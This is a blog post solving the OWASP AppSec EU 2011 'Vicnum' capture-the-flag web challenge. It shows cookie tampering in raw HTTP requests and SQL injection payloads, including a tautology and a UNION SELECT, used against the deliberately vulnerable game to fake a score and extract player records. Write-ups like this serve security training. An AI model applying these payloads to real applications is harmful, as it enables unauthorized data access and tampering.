Tuesday, February 22, 2011

Vicnum The Game Challenge -- OWASP AppSec EU 2011

Just a quick post about this nice and quick challenge. You can still play here, and congratulations to the winner Steve van der Baan (see his solution here).

Basically, the webapp choose a 3 digits random number that we need to guess, but finding a way to:
  • Hack the Game: Guess with 0 tries  (yep, better than a lucky guess)  and with a number > 3 digits (1337, for example)
  • Find a database player with the worst possible score and place another record in the database with that player’s name concatenated to your name and with a positive score. Something like "worst_player+"
First step: Hack the Game

Looking at the server response, it can be observed a base64 encoded value:
If you decode it (469) and enter this number... you'll guess the value :)

However, it'll put that you tried once... how to put "0 guesses"? Easy, once you get one valid guess the server issues the following cookies
       Milano=0012AA9B12good_username_ Brussels=0029A9B91crisp1; Geneva=92BEF345Apecan469
It's easy to spot the meaning of the cookies
  • Milano==username
  • Brussels==number_of_tries
  • Geneva==guessed_number

So, lauching the following request will get us hack the first part:
GET /vicnum4.php HTTP/1.1
Host: vicnum.ciphertechs.com
Referer: http://vicnum.ciphertechs.com/cgi-bin/vicnum2.pl

Cookie: Milano=0012AA9B12good; Brussels=0029A9B91crisp0; Geneva=92BEF345Apecan1337

Second step: Hack the Database

After guessing properly the number, the webapp allows to search for all the users that have guessed the number. It's a simple SQL injection

So, injecting the following query on the search feature will list all the users
  • player='+or+'1'%3d'1    => ' or '1'='1
And, after wasting some minutes trying to parse the server response I realized that I could be able to use the own SQL Injection to give me the "worst player"...
  • player='+union+select+min(count),'1','1','1'+from+results+where+'1'%3d'1  => ' union select min(count),'1','1','1' from results where '1'='1

So, we'll spot the user "appseceu" with -214748348 guesses, so seems that we have now the username. Finally, using the trick used on first part (changing cookies), we solve the challenge:

GET /vicnum4.php HTTP/1.1
Host: vicnum.ciphertechs.com
Referer: http://vicnum.ciphertechs.com/cgi-bin/vicnum2.pl
Cookie: Milano=0012AA9B12goodappseceu_username_; Brussels=0029A9B91crisp1; Geneva=92BEF345Apecan1337

Solved :). Thanks for this mini-webchallenge. As a reminder, the 21st of each month will be published a new challenge until the conference in June, so stay tuned to @appseceu.

Bonus Track:
Btw, a nice XSS :)


1 comment: